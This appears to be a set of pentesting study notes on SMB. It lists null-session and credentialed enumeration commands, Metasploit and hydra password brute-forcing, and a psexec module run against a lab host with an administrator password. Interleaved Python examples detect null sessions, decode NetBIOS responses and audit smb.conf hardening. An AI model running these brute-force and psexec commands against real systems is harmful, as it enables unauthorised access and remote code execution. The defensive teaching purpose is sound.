SMB
SMB (Server Message Block) is a protocol used to manage (read, write, share) files on a network composed of Windows machines. It is commonly used to access printers within a network. Files are stored in what are called "shares," each protected by authentication (username and password). In the latest versions of SMB, access rights can be defined for each file. SMB 3.1.1 is the most recent version.
SMB uses TCP port 445; originally it ran on top of NetBIOS over TCP port 139. Samba is the Linux implementation of SMB and allows Windows systems to access Linux shares and devices.
SMB is one of the most commonly exploited attack vectors on Windows systems when proper security mechanisms are not configured, potentially exposing sensitive information to attackers.
Enumeration
Nmap Scripts
nmap --script nbstat.nse <TARGET>
nmap --script smb-os-discovery <TARGET>
nmap --script smb-enum-shares -p139,445 <TARGET>
nmap --script smb-vuln* <TARGET>
nbstat.nse: Gathers NetBIOS names and MAC addresses.
smb-os-discovery: Enumerates OS details via SMB.
smb-enum-shares: Enumerates SMB shares on a target.
smb-vuln*: Checks for SMB vulnerabilities.
Basic Host Discovery
ping -a <TARGET>
NetBIOS Enumeration
nbtscan <TARGET>
nmblookup -A <IP>
nbtscan: Scans IP addresses for NetBIOS name tables.
nmblookup: Queries NetBIOS over TCP/IP (unmaintained as of Samba 4.9).
Session Connection
The IPC$ share allows anonymous connections to perform activities like enumerating domain accounts and shares. Useful commands include:
Null Session Tools
smbclient -L <TARGET_IP> -U ""
rpcclient -U "" -N <TARGET_IP>
enum4linux -a <TARGET_IP>
smbclient -L: Lists available SMB shares.
rpcclient: Interacts with RPC over SMB to enumerate details.
enum4linux: Comprehensive enumeration of SMB and LDAP on the target.
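Added example for these notes (not from the original page): a Python script that looks for the server-side traces the null-session commands above leave behind. It parses a constructed, flattened rendering of Windows Security Event ID 5140 ("A network share object was accessed"), flags anonymous logons to IPC$, and flags a source that touches several distinct shares within a short window (a share sweep). The log format, the `analyze`/`parse_line` names and the thresholds are assumptions for this example; real EVTX or SIEM exports need their own field extraction, but the logic is the same.

```python
# Added example for these notes (not from the original page): flag null-session
# activity and share-enumeration sweeps in Windows Security log records.
# The log format below is a constructed, flattened rendering of Event ID 5140
# ("A network share object was accessed"); real exports (XML, EVTX, SIEM JSON)
# need their own field extraction, but the detection logic is the same.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: the 10.0.0.5 lines look like null sessions to IPC$,
# the 10.0.0.9 lines look like an authenticated share sweep, bob is normal use.
SAMPLE_LOG = r"""
2024-05-01T09:59:59 EventID=4624 Account="alice" LogonType=3
2024-05-01T10:00:01 EventID=5140 Account="ANONYMOUS LOGON" SourceAddress=10.0.0.5 ShareName="\\*\IPC$"
2024-05-01T10:00:02 EventID=5140 Account="ANONYMOUS LOGON" SourceAddress=10.0.0.5 ShareName="\\*\IPC$"
2024-05-01T10:00:05 EventID=5140 Account="alice" SourceAddress=10.0.0.9 ShareName="\\*\IPC$"
2024-05-01T10:00:06 EventID=5140 Account="alice" SourceAddress=10.0.0.9 ShareName="\\*\Finance"
2024-05-01T10:00:07 EventID=5140 Account="alice" SourceAddress=10.0.0.9 ShareName="\\*\HR"
2024-05-01T10:00:08 EventID=5140 Account="alice" SourceAddress=10.0.0.9 ShareName="\\*\ADMIN$"
2024-05-01T10:30:00 EventID=5140 Account="bob" SourceAddress=10.0.0.12 ShareName="\\*\Finance"
2024-05-01T10:45:00 EventID=5140 Account="bob" SourceAddress=10.0.0.12 ShareName="\\*\HR"
"""

# Only 5140 records with the fields we need match; everything else is skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) EventID=5140 Account="(?P<account>[^"]*)" '
    r'SourceAddress=(?P<src>\S+) ShareName="(?P<share>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for a 5140 share-access record, or None for other lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "account": m.group("account"),
        "src": m.group("src"),
        "share": m.group("share"),
    }


def find_null_sessions(events):
    """(source, timestamp) for every anonymous logon that touched IPC$."""
    return [
        (e["src"], e["ts"])
        for e in events
        if e["account"].upper() == "ANONYMOUS LOGON"
        and e["share"].upper().endswith("IPC$")
    ]


def find_share_sweeps(events, window=timedelta(seconds=60), min_shares=3):
    """Sources that accessed >= min_shares distinct shares inside one window.

    Returns {source: max distinct shares seen in any window}."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_src[e["src"]].append(e)
    flagged = {}
    for src, evs in by_src.items():
        best = 0
        for i, start in enumerate(evs):  # slide a window from each event
            shares = {x["share"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            best = max(best, len(shares))
        if best >= min_shares:
            flagged[src] = best
    return flagged


def analyze(log_text):
    """Parse a log export and return both detections plus the event count."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        "events": len(events),
        "null_sessions": find_null_sessions(events),
        "share_sweeps": find_share_sweeps(events),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for src, ts in result["null_sessions"]:
        print(f"null session to IPC$ from {src} at {ts}")
    for src, n in result["share_sweeps"].items():
        print(f"share sweep from {src}: {n} distinct shares within 60s")
```

Anonymous access to IPC$ is the signal that "Disable Null Sessions" below is about; the sweep rule catches the authenticated variant (smbmap, crackmapexec --shares) that null-session blocking does not stop, so tune `min_shares` against normal file-server usage before alerting on it.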
Windows SMB Enumeration
smbmap -H <TARGET>
net view \\<TARGET_IP> /All
User-Specific Share Access
smbmap -H <TARGET> -u <USER> -p <PWD>
smbclient //<TARGET_IP>/<SHARE> -U <USER>%<PWD>
crackmapexec smb <TARGET_IP> -u '<USER>' -p '<PWD>' --shares
python3 lookupsid.py <DOMAIN>/<USER>:<PWD>@<TARGET_IP>
smbmap: Lists accessible shares.
crackmapexec: Automates SMB enumeration and testing.
lookupsid.py: Enumerates security identifiers (SIDs) via SMB (Impacket tool).
Metasploit Framework
Enumerate Shares
use auxiliary/scanner/smb/smb_enumshares
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploit
Enumerate SIDs
use auxiliary/scanner/smb/smb_lookupsid
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploit
Enumerate Login
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS <TARGET>
set VERBOSE false
exploit
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET> smb
PsExec
use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser Administrator
set SMBPass qwertyuiop
exploit
Tools Overview
nbtscan: Scans for NetBIOS names across subnets.
smbmap: Lists shares, access levels, and permissions for a target.
smbclient: CLI tool to interact with SMB shares (part of Samba).
crackmapexec: A versatile tool for pentesting Active Directory, SMB, and more.
Impacket Tools: Includes tools like lookupsid.py, smbexec.py, and others for SMB testing.
nmblookup: Queries NetBIOS names over TCP/IP.
NetBIOS Name Types
Type          Hex Code  Description
Unique Names  00        Workstation Service (workstation name)
Unique Names  03        Windows Messenger service
Unique Names  06        Remote Access Service
Unique Names  20        File Service (Host Record)
Unique Names  21        Remote Access Service client
Unique Names  1B        Domain Master Browser (Primary Domain Controller for a domain)
Unique Names  1D        Master Browser
Group Names   00        Workstation Service (workgroup/domain name)
Group Names   1C        Domain Controllers for a domain
Group Names   1E        Browser Service Elections
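Added example for these notes (not from the original page): a Python decoder for the NODE_NAME entries of a NetBIOS node-status (NBSTAT) response, the data that nbtscan, nmblookup -A and nbstat.nse summarise. It applies the suffix table above, reads the group flag that decides which half of the table applies, and pulls the adapter MAC that follows the name list. The layout is RFC 1002 section 4.2.18; the sample response is constructed in code (not a capture), and the function names are this example's own.

```python
# Added example for these notes (not from the original page): decode the
# NODE_NAME entries of a NetBIOS node-status (NBSTAT) response. Layout follows
# RFC 1002 section 4.2.18; the sample response below is constructed, not captured.
import struct

# Suffix meanings copied from the NetBIOS Name Types table in these notes
UNIQUE_SUFFIXES = {
    0x00: "Workstation Service (workstation name)",
    0x03: "Windows Messenger service",
    0x06: "Remote Access Service",
    0x20: "File Service (Host Record)",
    0x21: "Remote Access Service client",
    0x1B: "Domain Master Browser (Primary Domain Controller for a domain)",
    0x1D: "Master Browser",
}
GROUP_SUFFIXES = {
    0x00: "Workstation Service (workgroup/domain name)",
    0x1C: "Domain Controllers for a domain",
    0x1E: "Browser Service Elections",
}

FLAG_GROUP = 0x8000   # NAME_FLAGS G bit: group name rather than unique name
FLAG_ACTIVE = 0x0400  # NAME_FLAGS ACT bit: name is currently active
NODE_NAME_LEN = 18    # 15-byte name + 1-byte suffix + 2-byte flags


def build_node_status_rdata(names, mac):
    """Build NBSTAT RDATA: NUM_NAMES, NODE_NAME entries, then the 6-byte UNIT_ID.

    names: list of (name, suffix, is_group); mac: 6 raw bytes."""
    out = bytearray([len(names)])
    for name, suffix, is_group in names:
        flags = FLAG_ACTIVE | (FLAG_GROUP if is_group else 0)
        out += name.encode("ascii").ljust(15, b" ")  # names are space padded
        out += bytes([suffix]) + struct.pack(">H", flags)
    out += mac
    return bytes(out)


def parse_node_status_rdata(data):
    """Decode NUM_NAMES entries and the MAC; raises on a truncated buffer."""
    num = data[0]
    off = 1
    entries = []
    for _ in range(num):
        if len(data) < off + NODE_NAME_LEN:
            raise ValueError("truncated NODE_NAME entry")
        raw_name = data[off:off + 15]
        suffix = data[off + 15]
        (flags,) = struct.unpack(">H", data[off + 16:off + 18])
        is_group = bool(flags & FLAG_GROUP)
        table = GROUP_SUFFIXES if is_group else UNIQUE_SUFFIXES
        entries.append({
            "name": raw_name.decode("ascii", "replace").rstrip(),
            "suffix": suffix,
            "group": is_group,
            "active": bool(flags & FLAG_ACTIVE),
            "meaning": table.get(suffix, "unknown"),
        })
        off += NODE_NAME_LEN
    mac = data[off:off + 6]
    if len(mac) != 6:
        raise ValueError("truncated STATISTICS / UNIT_ID")
    return {"names": entries, "mac": ":".join(f"{b:02X}" for b in mac)}


def summarize(parsed):
    """Host name, workgroup/domain, and whether the host registers as a DC (1C)."""
    names = parsed["names"]
    host = next((e["name"] for e in names if not e["group"] and e["suffix"] in (0x00, 0x20)), None)
    domain = next((e["name"] for e in names if e["group"] and e["suffix"] == 0x00), None)
    is_dc = any(e["group"] and e["suffix"] == 0x1C for e in names)
    return {"host": host, "domain": domain, "domain_controller": is_dc}


# Constructed sample: a file server in the CORP domain that also registers
# the 1C group name, i.e. it advertises itself as a domain controller.
SAMPLE_NAMES = [("FILESRV01", 0x00, False), ("FILESRV01", 0x20, False),
                ("CORP", 0x00, True), ("CORP", 0x1C, True), ("CORP", 0x1E, True)]
SAMPLE_MAC = bytes.fromhex("001122334455")

if __name__ == "__main__":
    parsed = parse_node_status_rdata(build_node_status_rdata(SAMPLE_NAMES, SAMPLE_MAC))
    for e in parsed["names"]:
        kind = "GROUP " if e["group"] else "UNIQUE"
        print(f'{e["name"]:<15} <{e["suffix"]:02X}> {kind} {e["meaning"]}')
    print("MAC:", parsed["mac"], summarize(parsed))
```

The same suffix byte means different things for unique and group names (00 is the host name in one and the workgroup in the other), which is why the decoder reads the G flag before consulting the table; a host that registers the 1C group name is claiming the domain controller role, which is worth reconciling against the asset inventory when reviewing scan output.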
Security Best Practices
Avoid Plaintext Passwords: Use environment variables or credential files instead of inline passwords.
Disable Null Sessions: Configure SMB servers to block unauthenticated access.
Encrypt Traffic: Enable SMB 3 encryption to protect data in transit.
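Added example for these notes (not from the original page): a Python audit of a Samba smb.conf for the settings behind the three points above, anonymous access, guest mapping, the SMB1 floor, and transport encryption. The parameter names (restrict anonymous, map to guest, null passwords, server min protocol, smb encrypt / server smb encrypt, guest ok) are real Samba options; the weak and hardened configs, the parser and the `audit_smb_conf` name are this example's own constructions. Windows hosts have the equivalent knobs in Set-SmbServerConfiguration and the RestrictAnonymous policy, which this script does not cover.

```python
# Added example for these notes (not from the original page): audit a Samba
# smb.conf for the weak settings the best-practice list above warns about.
# The parameter names are real Samba options; both configs are constructed.

WEAK_CONF = """\
[global]
   workgroup = CORP
   server min protocol = NT1
   restrict anonymous = 0
   map to guest = Bad User
   smb encrypt = off

[public]
   path = /srv/public
   guest ok = yes
   writable = yes
"""

HARDENED_CONF = """\
[global]
   workgroup = CORP
   server min protocol = SMB3
   restrict anonymous = 2
   map to guest = Never
   null passwords = no
   smb encrypt = required

[finance]
   path = /srv/finance
   guest ok = no
   valid users = @finance
"""

# Protocol names that select an SMB1 dialect for "server min protocol"
SMB1_PROTOCOLS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}
TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {param: value}}, keys lowercased
    and whitespace-normalised so 'Server  Min Protocol' matches."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # comment or blank line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples; empty means nothing flagged."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []

    # Defaults below are Samba's own defaults when the parameter is absent
    minproto = g.get("server min protocol", "smb2_02").lower()
    if minproto in SMB1_PROTOCOLS:
        findings.append(("global", f"server min protocol = {minproto} allows SMB1"))
    if g.get("restrict anonymous", "0") != "2":
        findings.append(("global", "restrict anonymous != 2: anonymous IPC$ (null session) connections allowed"))
    if g.get("map to guest", "never").lower() != "never":
        findings.append(("global", "map to guest maps failed logons to the guest account"))
    if g.get("null passwords", "no").lower() in TRUE_VALUES:
        findings.append(("global", "null passwords = yes accepts empty passwords"))
    # "server smb encrypt" is the newer spelling; fall back to "smb encrypt"
    enc = (g.get("server smb encrypt") or g.get("smb encrypt") or "default").lower()
    if enc != "required":
        findings.append(("global", f"smb encrypt = {enc}: transport encryption not enforced"))

    for name, share in conf.items():
        if name == "global":
            continue
        if share.get("guest ok", "no").lower() in TRUE_VALUES:
            findings.append((name, "guest ok = yes allows unauthenticated access"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for section, finding in audit_smb_conf(conf) or [("-", "no findings")]:
            print(f"[{section}] {finding}")
```

Run it against `/etc/samba/smb.conf` by reading the file into `audit_smb_conf`; `restrict anonymous = 2` is what actually closes the anonymous IPC$ enumeration path that smbclient -L, rpcclient -N and enum4linux rely on, and `smb encrypt = required` turns away clients that cannot negotiate SMB 3 encryption, so check that no legacy client still needs those before enforcing both.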